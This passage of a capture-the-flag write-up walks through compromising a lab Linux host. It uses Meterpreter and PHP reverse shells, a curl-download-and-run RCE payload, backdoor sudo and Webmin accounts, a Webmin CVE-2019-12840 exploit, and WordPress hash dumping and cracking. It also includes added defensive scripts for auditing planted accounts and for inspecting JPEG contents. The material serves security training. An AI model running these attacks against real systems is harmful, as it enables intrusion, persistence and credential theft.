No encoder specified, outputting raw payload
Payload size: 1106216 bytes
Final size of elf file: 1106216 bytes
```
Once we generated the payload, let’s launch the MSFConsole, and prepare for the reverse shell connection.
```
andrew@kali:~$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter_reverse_tcp
payload => linux/x86/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.10.2
lhost => 10.10.10.2
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.10.2:4444
```
Upload the Meterpreter payload
Now, we’re ready to upload and run the payload on the Habanero host. Using the same method earlier, use the following syntax to upload and run the executable.
<pre>system('curl http://10.10.10.2/rshell -o /tmp/r; ls -l /tmp/r; chmod 777 /tmp/r; /tmp/r')</pre>
If we go back to our MSFConsole, you should now see a Meterpreter session opened. From the Meterpreter, we can switch to a simple shell by issuing the command as shown below.
```
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.10.2:4444
[*] Meterpreter session 3 opened (10.10.10.2:4444 -> 172.20.20.22:58052) at 2021-06-12 19:00:17 -0700

meterpreter > shell
Process 22046 created.
Channel 1 created.
whoami
administrator
id
uid=0(root) gid=0(root) groups=0(root)
```
To switch to a root bash shell, issue the command below. Note the warnings bash prints: there is no job control because Meterpreter’s shell channel has no pseudo-terminal attached, so this is a root shell but not a fully interactive one. There are other ways to upgrade it further, but this one worked just fine, so we’ll leave it alone.
```
sudo bash -i
bash: cannot set terminal process group (20044): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu-00:/var/www/wordpress/wp-admin#
```
Since we now have root access, we can change passwords and remove users. However, if we don’t remediate the vulnerabilities, Kaos Corp can simply get back in the same way we did. That said, we need to remediate all of the vulnerabilities first before making those changes.
Fastest and easiest
While that was a good exercise, there is a faster and easier way to get a shell: create a new account and make it a sudoer, all through the same unauthenticated RCE. Keep in mind that on a real engagement, adding an account to a client system is noisy and leaves an artifact that you must document and remove afterwards.
<pre>system('sudo useradd --shell /bin/bash andrew; echo andrew:password | sudo chpasswd; sudo usermod -aG sudo andrew')</pre>
If we did everything right, we should be able to SSH to the host using the login credentials we set in our syntax above.
```
andrew@kali:~$ ssh andrew@172.20.20.22
andrew@172.20.20.22's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Oct 22 21:46:07 UTC 2020

  System load:  0.0                Processes:             110
  Usage of /:   28.3% of 19.56GB   Users logged in:       1
  Memory usage: 16%                IP address for ens18:  172.20.20.22
  Swap usage:   0%

 * Introducing autonomous high availability clustering for MicroK8s
   production environments! Super simple clustering, hardened
   Kubernetes, with automatic data store operations. A zero-ops HA
   K8s for anywhere.

     https://microk8s.io/high-availability

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

20 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

*** System restart required ***
Last login: Thu Oct 22 21:39:03 2020 from 10.10.10.2
andrew@ubuntu-00:~$
```
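The flip side of the account-and-sudo trick is that it is exactly what you look for once the host is back under your control. The script below is an added example, not part of the original write-up: two functions that read files in the standard /etc/passwd and /etc/group formats and list every uid-0 account, every member of the sudo group, and every human account with a real login shell that is not on an allowlist. The sample files written by write_samples are constructed for illustration and mirror what the useradd/usermod command above would leave behind; on a real host you point the functions at /etc/passwd and /etc/group.

```shell
#!/bin/sh
# Added example (not from the original post): find planted privileged accounts.
# Works on any files in /etc/passwd and /etc/group format.

# privileged_accounts PASSWD GROUP: every uid-0 account plus every sudo member,
# printed one per line as "<user> <reason>".
privileged_accounts() {
  passwd="$1"; group="$2"
  awk -F: '$3 == 0 { print $1 " uid0" }' "$passwd"
  # supplementary members listed in the sudo line of the group file
  awk -F: '$1 == "sudo" && $4 != "" { n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] " sudo" }' "$group"
  # users whose primary group is sudo (these never appear in the member column)
  sudo_gid=$(awk -F: '$1 == "sudo" { print $3 }' "$group")
  if [ -n "$sudo_gid" ]; then
    awk -F: -v g="$sudo_gid" '$4 == g { print $1 " sudo-primary" }' "$passwd"
  fi
}

# unexpected_login_users PASSWD USER...: human accounts (uid 1000-65533) with a real
# login shell that are not in the allowlist of known users.
unexpected_login_users() {
  passwd="$1"; shift
  awk -F: -v allow="$*" '
    BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $3 >= 1000 && $3 < 65534 && $7 !~ /(nologin|false)$/ && !($1 in ok) { print $1 }' "$passwd"
}

# write_samples DIR: constructed passwd/group pair; "andrew" is the planted account.
write_samples() {
  cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
administrator:x:1000:1000::/home/administrator:/bin/bash
andrew:x:1001:1001::/home/andrew:/bin/bash
EOF
  cat > "$1/group" <<'EOF'
root:x:0:
sudo:x:27:administrator,andrew
administrator:x:1000:
andrew:x:1001:
EOF
}

# Demo against the constructed files. Run with:  sh audit.sh demo
if [ "${1:-}" = "demo" ]; then
  d=$(mktemp -d)
  write_samples "$d"
  privileged_accounts "$d/passwd" "$d/group"
  echo "--- login users not in the allowlist (root administrator):"
  unexpected_login_users "$d/passwd" root administrator
  rm -r "$d"
fi
```

The sudo-primary check matters because a user created with its primary gid set to the sudo group is a sudoer without ever appearing in the sudo line of /etc/group, which is where most quick checks stop.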
Since we have valid WordPress login credentials and an administrator role, we can abuse this access to get a shell. There are two ways that I know of to accomplish this. We’ll try both of them to see if they’re effective.
With our valid credentials, we can attempt to use MSFConsole to upload a web shell. This particular module doesn’t always work because it depends on the target host’s configuration.
msf6 > use exploit/unix/webapp/wp_admin_shell_upload

```
andrew@kali:~$ msfconsole -q
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password guest
password => guest
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username guest
username => guest
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 172.20.20.22
rhost => 172.20.20.22
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.10.2
lhost => 10.10.10.2
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 192.168.8.229:4444
[*] Authenticating with WordPress using guest:guest...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/qetTfmULlg/MhxlHLNMNd.php...
[!] This exploit may require manual cleanup of 'MhxlHLNMNd.php' on the target
[!] This exploit may require manual cleanup of 'qetTfmULlg.php' on the target
[!] This exploit may require manual cleanup of '../qetTfmULlg' on the target
[*] Exploit completed, but no session was created.
```
Unfortunately, this module doesn't produce a session on this target. Two things in the output are worth noting. First, authentication and the plugin upload both succeeded, so the failure is in the callback, not the upload; the handler was started on 192.168.8.229:4444 rather than the 10.10.10.2 we set as LHOST, which would explain why the target never reached us. Second, the cleanup warnings mean the module left its plugin directory and PHP files under wp-content/plugins/ on the target, and those should be removed once we're done. Either way, we need another way to get a reverse shell.
Using msfvenom, we can generate a stageless PHP Meterpreter payload (php/meterpreter_reverse_tcp, with an underscore; php/meterpreter/reverse_tcp is the staged variant) and upload it ourselves. The steps are similar to the section above.
andrew@kali:~$ msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.10.2 lport=4444 -f raw > phpshell
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34277 bytes
Once the payload is generated, we prepare our machine to accept the connection from the target. As before, we use msfconsole, this time with the generic multi/handler, and set its payload to the same one msfvenom produced so the handler speaks the right protocol.
msf6 > use exploit/multi/handler
andrew@kali:~$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.10.2
lhost => 10.10.10.2
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.10.2:4444
Now, view the payload file and copy its contents to the clipboard. Log into the WordPress dashboard, go to Appearance > Editor, and open the 404 Template (404.php) of the active theme. Paste the payload at the top of that file and save it.
Now we're ready to trigger the reverse shell. To launch it, we request a page that doesn't exist so that WordPress renders 404.php, which executes our payload. If we did everything right, we should see a Meterpreter session, as shown below.
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.10.2:4444
[*] Meterpreter session 5 opened (10.10.10.2:4444 -> 172.20.20.22:58058) at 2021-06-13 19:50:21 -0700

meterpreter >
As we've seen earlier, the account the web server runs PHP as can use sudo without a password, so dropping to a shell and running sudo bash -i gets us root. Bash warns that it has no job control because there is no tty behind the session; it is a root shell, just not a fully interactive one.
meterpreter > shell
Process 22293 created.
Channel 0 created.
pwd
/var/www/wordpress
sudo bash -i
bash: cannot set terminal process group (20044): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu-00:/var/www/wordpress#
Alternative PHP reverse shell
During the CTF event, I used the PHP reverse shell from pentestmonkey. It is quick and easy, and it doesn't require the Metasploit Framework at all.
The process of pasting the code into 404.php is the same as described above. However, we need to change the address and port number in the PHP code before saving the file.
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
In our case, we change them to 10.10.10.2 and 4444. Once that's done, we go to the command line and use Netcat to start a listener on that port.
andrew@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
Now we're ready to request a non-existent page, just like we did earlier. If we did everything right, we should see something like the output below: the shell arrives as the administrator account (uid 1000), which is a member of the sudo and lxd groups, so sudo gets us root straight away.
nc -lvp 4444
andrew@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
172.20.20.22: inverse host lookup failed: Unknown host
connect to [10.10.10.2] from (UNKNOWN) [172.20.20.22] 58054
Linux ubuntu-00 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 21:30:38 up 14:00,  1 user,  load average: 0.07, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
administ pts/0    10.10.10.2       Tue17   10:49   0.48s  0.05s sshd: administrator [priv]
uid=1000(administrator) gid=1000(administrator) groups=1000(administrator),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
/bin/sh: 0: can't access tty; job control turned off
$ sudo bash -i
bash: cannot set terminal process group (20044): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu-00:/#
Webmin RCE method
Since we have a valid Webmin username and password (admin / littlewing!9), we can use them against the authenticated remote code execution in the package-updates module of Webmin 1.910 (CVE-2019-12840), which is the version installed under /home/administrator on this host. We're going to use Metasploit again for this attack.
msf6 > use exploit/linux/http/webmin_packageup_rce
andrew@kali:~$ msfconsole -q
msf6 > use exploit/linux/http/webmin_packageup_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > set rhost 172.20.20.22
rhost => 172.20.20.22
msf6 exploit(linux/http/webmin_packageup_rce) > set username admin
username => admin
msf6 exploit(linux/http/webmin_packageup_rce) > set password littlewing!9
password => littlewing!9
msf6 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.10.2
lhost => 10.10.10.2
msf6 exploit(linux/http/webmin_packageup_rce) > set lport 4444
lport => 4444
msf6 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.10.2:4444
[+] Session cookie: 3e9623f12e74caec130f3a8932aee065
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.10.2:4444 -> 172.20.20.22:58040) at 2021-06-13 23:48:32 -0700

pwd
/home/administrator/webmin-1.910/package-updates
sudo bash -i
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@ubuntu-00:/home/administrator/webmin-1.910/package-updates#
In the previous attacks, sudo bash -i was enough to get a usable root shell. Here the Perl command shell gives us root after sudo bash -i but no prompt at all, so we use Python (2 or 3 both work) to spawn a pty and get a fully interactive shell.
No login credentials
If we had no Webmin credentials, we could use the unauthenticated RCE covered earlier to create some and then run the authenticated exploit above. The steps below are executed through that RCE, which is why each command is wrapped in system('...'): add a user account, grant it module permissions, set its password, and restart the Webmin service.
Loosen the permissions on the file where Webmin stores its login credentials so we can append to it. Note that 666 leaves the file world-writable; restore the original permissions once the account exists.
system('sudo chmod 666 /etc/webmin/miniserv.users')
Append an entry for the new user. The field layout matches Webmin's miniserv.users format, and the hash in this line is only a placeholder, since we set the real password with changepass.pl in a later step.
system('echo andrew:\$1\$84720675\$F08uAAcIMcN8lZNg9D74p1:::::1584720675:::0:::: >> /etc/webmin/miniserv.users')
Grant the new user access to every module by appending a line to webmin.acl. At minimum the user needs the package-updates module, since that is the one the exploit above goes through.
system('echo "andrew: backup-config change-user webmincron usermin webminlog webmin help servers acl bacula-backup init passwd quota mount fsdump inittab jailkit ldap-client ldap-useradmin logrotate mailcap mon pam certmgr proc at cron sentry package-updates software man syslog syslog-ng system-status useradmin security-updates apache bind8 pserver dhcpd dhcp-dns dovecot exim fetchmail foobar frox jabber ldap-server majordomo htpasswd-file minecraft mysql openslp postfix postgresql proftpd procmail qmailadmin mailboxes sshd samba sendmail spam squid sarg wuftpd webalizer link adsl-client bandwidth fail2ban firewalld ipsec krb5 firewall firewall6 exports exports-nfs4 nis net xinetd inetd pap ppp-client pptp-client pptp-server stunnel shorewall shorewall6 itsecur-firewall tcpwrappers idmapd filter burner grub lilo raid lvm fdisk lpadmin smart-status time vgetty iscsi-client iscsi-server iscsi-tgtd iscsi-target cluster-passwd cluster-copy cluster-cron cluster-shell cluster-shutdown cluster-software cluster-usermin cluster-useradmin cluster-webmin cfengine heartbeat shell custom disk-usage export-test ftelnet filemin flashterm tunnel file phpini php-pear cpan htaccess-htpasswd ruby-gems telnet ssh ssh2 shellinabox status ajaxterm updown vnc dfsadmin ipfilter ipfw smf bsdexports bsdfdisk format hpuxexports rbac sgiexports zones dnsadmin" >> /etc/webmin/webmin.acl')
Set the real password for the user we created with Webmin's changepass.pl script (here simply "password").
system('sudo /home/administrator/webmin-1.910/changepass.pl /etc/webmin andrew password')
Restart the Webmin service so the changes take effect.
If we did everything right, running the same exploit as above with the new username and password will yield the same results. Remember to restore the permissions on miniserv.users and remove the account once the engagement is over.
Since we also have MySQL credentials, we can use them to pull the WordPress password hashes and try to crack them. This section isn't needed for the CTF objectives, but I wanted to demonstrate the use of every credential we've discovered.
Since we have shell access on the host, we can connect to MySQL locally with the root credentials found earlier. The password appears in the transcript below because the shell has no tty and simply echoes what we type.
mysql -u root -p
root@ubuntu-00:/home/administrator/webmin-1.910/package-updates# mysql -u root -p
Enter password: notroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 560
Server version: 5.7.31-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
Let’s display the databases available.
mysql> show databases;
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| wordpress          |
+--------------------+
5 rows in set (0.04 sec)
Since we want WordPress, let’s choose that.
mysql> use wordpress;
mysql> use wordpress;
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
Let’s display the tables in the database.
mysql> show tables;
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_wordpress         |
+-----------------------------+
| wp_bwg_album                |
| wp_bwg_album_gallery        |
| wp_bwg_gallery              |
| wp_bwg_image                |
| wp_bwg_image_comment        |
| wp_bwg_image_rate           |
| wp_bwg_image_tag            |
| wp_bwg_option               |
| wp_bwg_shortcode            |
| wp_commentmeta              |
| wp_comments                 |
| wp_links                    |
| wp_options                  |
| wp_postmeta                 |
| wp_posts                    |
| wp_term_relationships       |
| wp_term_taxonomy            |
| wp_termmeta                 |
| wp_terms                    |
| wp_usermeta                 |
| wp_users                    |
| wp_wc_avatars_cache         |
| wp_wc_comments_subscription |
| wp_wc_feedback_forms        |
| wp_wc_follow_users          |
| wp_wc_phrases               |
| wp_wc_users_rated           |
| wp_wc_users_voted           |
+-----------------------------+
28 rows in set (0.01 sec)
We're interested in the wp_users table, so let's dig further.
mysql> describe wp_users;
mysql> describe wp_users;
describe wp_users;
+---------------------+---------------------+------+-----+---------------------+----------------+
| Field               | Type                | Null | Key | Default             | Extra          |
+---------------------+---------------------+------+-----+---------------------+----------------+
| ID                  | bigint(20) unsigned | NO   | PRI | NULL                | auto_increment |
| user_login          | varchar(60)         | NO   | MUL |                     |                |
| user_pass           | varchar(255)        | NO   |     |                     |                |
| user_nicename       | varchar(50)         | NO   | MUL |                     |                |
| user_email          | varchar(100)        | NO   | MUL |                     |                |
| user_url            | varchar(100)        | NO   |     |                     |                |
| user_registered     | datetime            | NO   |     | 0000-00-00 00:00:00 |                |
| user_activation_key | varchar(255)        | NO   |     |                     |                |
| user_status         | int(11)             | NO   |     | 0                   |                |
| display_name        | varchar(250)        | NO   |     |                     |                |
+---------------------+---------------------+------+-----+---------------------+----------------+
10 rows in set (0.00 sec)
Since we're interested in the passwords, we select the user_pass column, along with ID and user_login so we know which hash belongs to which account.
mysql> SELECT ID, user_login, user_pass FROM wp_users;
mysql> SELECT ID, user_login, user_pass FROM wp_users;
SELECT ID, user_login, user_pass FROM wp_users;
+----+------------+------------------------------------+
| ID | user_login | user_pass                          |
+----+------------+------------------------------------+
|  1 | admin      | $P$By2JGSns1uOZ6WG8aI1otKigTWzme21 |
|  2 | guest      | $P$B1Vwz5gdMKoIc.OFZY.dbz2btpZh6X. |
+----+------------+------------------------------------+
2 rows in set (0.00 sec)
There's no guarantee we can crack this hash, but we're going to try and see whether the password is weak.
For this exercise, we use hashcat in mode 400 (phpass, the salted, iterated MD5 scheme behind WordPress's $P$ hashes) with a straight dictionary attack (-a 0). I typically pair hashcat with the RockYou wordlist, so we'll use that.
hashcat -m 400 -a 0 '$P$By2JGSns1uOZ6WG8aI1otKigTWzme21' /usr/share/wordlists/rockyou.txt
andrew@kali:~$ hashcat -m 400 -a 0 '$P$By2JGSns1uOZ6WG8aI1otKigTWzme21' /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 (May  8 2021 03:14:28)) - Platform #1 [Apple]
====================================================================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped
* Device #2: Intel(R) HD Graphics 530, 1472/1536 MB (384 MB allocatable), 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 4032/4096 MB (1024 MB allocatable), 16MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 461 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921512
* Keyspace..: 14344385

$P$By2JGSns1uOZ6WG8aI1otKigTWzme21:admin

Session..........: hashcat
Status...........: Cracked
Hash.Name........: phpass
Hash.Target......: $P$By2JGSns1uOZ6WG8aI1otKigTWzme21
Time.Started.....: Fri Jun 13 13:16:04 2021 (1 sec)
Time.Estimated...: Fri Jun 13 13:16:05 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:    17885 H/s (6.60ms) @ Accel:96 Loops:64 Thr:8 Vec:1
Speed.#3.........:   200.7 kH/s (9.42ms) @ Accel:128 Loops:128 Thr:64 Vec:1
Speed.#*.........:   218.6 kH/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 131072/14344385 (0.91%)
Rejected.........: 0/131072 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:5504-5568
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:8064-8192
Candidates.#2....: 123456 -> sweetgurl
Candidates.#3....: sunshine13 -> gerben

Started: Fri Jun 13 13:15:42 2021
Stopped: Fri Jun 13 13:16:07 2021
We’ve covered enough attacks in this article, and I think we should get back to the CTF and find the ransomware key.
According to the mission section, Kaos Corp transmitted the key from one of the Linux servers. Since this is a Linux server, let’s check things out to see if they left any clues for us.
In the unauthenticated RCE section, you may have noticed that they created an account with a username of kaos-corp to maintain access to the system. We can check the home directory to see if there’s something of value there.
ls -al /home/kaos-corp/
root@ubuntu-00:/home/administrator/webmin-1.910/package-updates# ls -al /home/kaos-corp/
total 44
drwxr-xr-x 6 kaos-corp kaos-corp 4096 Oct 14  2020 .
drwxr-xr-x 6 root      root      4096 Oct 16  2020 ..
-rw------- 1 root      root         5 Oct 14  2020 .bash_history
-rw-r--r-- 1 kaos-corp kaos-corp  220 Oct 14  2020 .bash_logout
-rw-r--r-- 1 kaos-corp kaos-corp 3771 Oct 14  2020 .bashrc
drwx------ 2 kaos-corp kaos-corp 4096 Oct 14  2020 .cache
drwx------ 3 kaos-corp kaos-corp 4096 Oct 14  2020 .gnupg
drwxrwxr-x 3 kaos-corp kaos-corp 4096 Oct 14  2020 .local
-rw-r--r-- 1 kaos-corp kaos-corp  807 Oct 14  2020 .profile
-rw-rw-r-- 1 kaos-corp kaos-corp   66 Oct 14  2020 .selected_editor
-rw-r--r-- 1 kaos-corp kaos-corp    0 Oct 14  2020 .sudo_as_admin_successful
drwxrwxr-x 2 kaos-corp kaos-corp 4096 Oct 14  2020 .tmp
Not much is there: the .bash_history is root-owned and only 5 bytes, and .sudo_as_admin_successful only tells us the account has used sudo at some point. I looked through the other users' home directories as well but found nothing, so we need to keep digging.
Instead of going through every directory by hand, let's search the whole filesystem for files owned by the kaos-corp user. Be aware that find also walks /proc, so any process running as that user shows up as a long list of /proc entries; pruning /proc or discarding errors keeps the output readable.
find / -user kaos-corp
root@ubuntu-00:/home/administrator/webmin-1.910/package-updates# find / -user kaos-corp
/home/kaos-corp
/home/kaos-corp/.bashrc
/home/kaos-corp/.gnupg
/home/kaos-corp/.gnupg/private-keys-v1.d
/home/kaos-corp/.cache
/home/kaos-corp/.cache/motd.legal-displayed
/home/kaos-corp/.sudo_as_admin_successful
/home/kaos-corp/.local
/home/kaos-corp/.local/share
/home/kaos-corp/.local/share/nano
/home/kaos-corp/.bash_logout
/home/kaos-corp/.selected_editor
/home/kaos-corp/.tmp
/home/kaos-corp/.profile
/var/spool/cron/crontabs/kaos-corp
/proc/20899
/proc/20899/task
/proc/20899/task/20899
[... the remaining /proc/20899/* entries, belonging to a process running as kaos-corp, are trimmed here ...]
/proc/20899/timerslack_ns
/proc/20899/patch_state
find: ‘/proc/22045/task/22045/net’: Invalid argument
find: ‘/proc/22045/net’: Invalid argument
find: ‘/proc/22303/task/22303/fd/6’: No such file or directory
find: ‘/proc/22303/task/22303/fdinfo/6’: No such file or directory
find: ‘/proc/22303/fd/5’: No such file or directory
find: ‘/proc/22303/fdinfo/5’: No such file or directory
/etc/memcache
/etc/memcache/.conf
/etc/memcache/.conf/sync-2021-06-14-07-20-01.jpg
/etc/memcache/update.sh
/etc/memcache/memcached.conf
Three things stand out in that listing: a crontab for kaos-corp under /var/spool/cron/crontabs, a process (PID 20899) running as that user, and a hidden .conf directory under /etc/memcache holding an update.sh script and a JPEG with a timestamped name. The crontab and update.sh deserve a read too, but since steganography is something CTF creators love to include, let's look at the image first. The strings command is the first tool I reach for when inspecting an image or binary file.
root@ubuntu-00:/home/administrator/webmin-1.910/package-updates# strings -n 10 /etc/memcache/.conf/sync-2021-06-14-07-20-01.jpg
;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
EPc'?0=0zTd
J?u$S1vE=?v
key-rachet-algo-23028: as32.whisper-cold-knowledge-feather
key-rachet-algo-23029: as32.cowboy-quad-powder-solidify
I tested the first key in the CTF portal, and it worked. We'll use this key to decrypt the VeraCrypt vault once we've worked out which of the remaining hosts is the Windows domain controller.
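strings tells us which printable runs are in the file but not where they sit, and the location matters: the gd-jpeg CREATOR line above lives in a JPEG comment segment written by the image library, while text a person appended by hand usually ends up after the end-of-image marker. The following added example (my own code, not part of the original article) walks the JPEG marker structure and tags each printable run with the region it falls in. It runs against a constructed JPEG-like byte string built inline, not the sync-...jpg from the target, and the region labels and the 10-character minimum are my choices.

```python
import re
from typing import List, Tuple

# JPEG marker bytes that matter for this triage: start/end of image, start of scan, comment.
SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE


def jpeg_regions(data: bytes) -> List[Tuple[str, int, int]]:
    """Split a JPEG into (label, start, end) byte regions by walking its marker segments."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    regions = [("SOI", 0, 2)]
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == SOS:
            # Entropy-coded scan data runs from here to the last EOI marker;
            # anything after that EOI is a trailer the decoder never reads.
            eoi = data.rfind(b"\xff\xd9")
            if eoi == -1:
                regions.append(("SCAN(no EOI)", pos, len(data)))
                return regions
            regions.append(("SCAN", pos, eoi))
            regions.append(("EOI", eoi, eoi + 2))
            if eoi + 2 < len(data):
                regions.append(("TRAILER", eoi + 2, len(data)))
            return regions
        # Every other segment carries a big-endian length that includes the 2 length bytes.
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if marker == COM:
            label = "COM"
        elif 0xE0 <= marker <= 0xEF:
            label = "APP%d" % (marker - 0xE0)   # APP0 (JFIF), APP1 (Exif), ...
        else:
            label = "SEG%02X" % marker          # quantisation tables, Huffman tables, frame header
        regions.append((label, pos, pos + 2 + length))
        pos += 2 + length
    regions.append(("UNPARSED", pos, len(data)))
    return regions


def strings_with_region(data: bytes, min_len: int = 10) -> List[Tuple[str, int, str]]:
    """Like `strings -n min_len`, but each hit is tagged with the JPEG region it falls in."""
    regions = jpeg_regions(data)
    hits = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        label = next((lab for lab, s, e in regions if s <= m.start() < e), "?")
        hits.append((label, m.start(), m.group().decode("ascii")))
    return hits


def build_sample() -> bytes:
    """Constructed stand-in for the file on the target: SOI, a COM segment,
    a fake scan body, EOI, then text appended after the image ends."""
    comment = b"CREATOR: constructed-comment-for-example"
    com = b"\xff\xfe" + (len(comment) + 2).to_bytes(2, "big") + comment
    scan = b"\xff\xda" + b"\x00\x08\x01\x01\x00\x00\x3f\x00" + bytes(range(0, 200))
    trailer = b"key-example-00001: constructed-trailer-words"
    return b"\xff\xd8" + com + scan + b"\xff\xd9" + trailer


if __name__ == "__main__":
    for label, offset, text in strings_with_region(build_sample()):
        print("%-8s @%-5d %s" % (label, offset, text))
```

On a real file, a hit labelled TRAILER is data the image viewer never looks at and is the first place to check for appended payloads; a long printable run inside SCAN is usually a coincidence in the compressed data, which is what the `%&'()*456789...` lines from the real strings output look like.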
From a CTF perspective, exploiting one vulnerability is often enough to get the flag. However, in a real-world engagement, you want to leave no stone unturned. In this article, we’ve exploited several security vulnerabilities to simulate a penetration testing engagement.
In the next one, we are going to explore the other hosts. We will attempt to exploit as many vulnerabilities as possible, just like what we did here.